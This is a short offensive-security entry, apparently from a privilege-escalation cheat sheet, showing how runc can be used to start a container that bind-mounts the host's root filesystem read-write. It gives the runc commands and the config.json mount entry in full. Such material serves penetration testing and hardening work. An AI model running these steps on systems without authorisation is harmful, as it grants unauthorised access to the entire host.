runc

runc is a lightweight, portable container runtime that manages the lifecycle of containers according to the Open Container Initiative (OCI) specifications. It is commonly used as the underlying runtime for container platforms like Docker.

If runc is installed on a host, it may be possible to create and run a container that mounts the host’s root filesystem (/), potentially allowing access to the entire host.

# Verify that runc is installed
runc --help

# Generate a container configuration file
runc spec

This creates a config.json file in the current directory. In that file, locate the "mounts" array and add the following entry, which bind-mounts the host’s root directory (/) read-write into the container:

{
    "type": "bind",
    "source": "/",
    "destination": "/",
    "options": [
        "rbind",
        "rw",
        "rprivate"
    ]
}

Next, create a rootfs folder in the same directory:

# Create the rootfs folder in the same directory
mkdir rootfs

# Start the container
runc run demo

This starts a container whose filesystem includes the host’s root filesystem. Note that the technique does not always succeed, because runc normally requires root privileges to run containers: invoked as an unprivileged user it generally fails unless a rootless configuration is in place. Rootless containers impose additional restrictions compared to containers run as root, which is why rootless mode is not the default.
